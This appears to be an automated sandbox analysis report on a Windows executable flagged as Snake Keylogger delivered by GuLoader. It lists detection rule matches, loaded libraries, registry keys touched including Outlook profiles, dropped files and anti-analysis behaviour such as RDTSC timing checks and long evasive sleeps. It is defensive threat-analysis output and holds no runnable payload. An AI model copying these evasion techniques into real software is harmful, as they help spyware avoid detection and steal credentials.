Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, -A-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, -A-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, -A-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/5@5/5

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046FF

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File created: C:\Users\user\AppData\Local\Temp\nsj84F3.tmp

Source: MC8017774DOCS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: MC8017774DOCS.exe	ReversingLabs: Detection: 42%
Source: MC8017774DOCS.exe	Virustotal: Detection: 48%

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File read: C:\Users\user\Desktop\MC8017774DOCS.exe

Source: unknown	Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Contains functionality to dynamically determine API calls

Source: MC8017774DOCS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: _.pdb source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2522664351.00000000037E7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2522145206.0000000000848000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 7084, type: MEMORYSTR

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_6E9B1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_6E9B2FD0 push eax; ret

0_2_6E9B2FFE

Drops PE files

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File created: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	API/Special instruction interceptor: Address: 38283BF
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	API/Special instruction interceptor: Address: 21F83BF

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	RDTSC instruction interceptor: First address: 37BE195 second address: 37BE195 instructions: 0x00000000 rdtsc 0x00000002 test cl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F56CC73E051h 0x00000008 test ch, dh 0x0000000a test bx, dx 0x0000000d inc ebp 0x0000000e cmp ecx, eax 0x00000010 inc ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	RDTSC instruction interceptor: First address: 218E195 second address: 218E195 instructions: 0x00000000 rdtsc 0x00000002 test cl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F56CD2809B1h 0x00000008 test ch, dh 0x0000000a test bx, dx 0x0000000d inc ebp 0x0000000e cmp ecx, eax 0x00000010 inc ebx 0x00000011 rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Memory allocated: 33AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Memory allocated: 33D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Memory allocated: 33B50000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598389	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595105	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594946	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594842	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594406	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Window / User API: threadDelayed 7749			Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Window / User API: threadDelayed 2093			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 1096	Thread sleep count: 7749 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 1096	Thread sleep count: 2093 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599438s >= -30000s	Jump to behavior
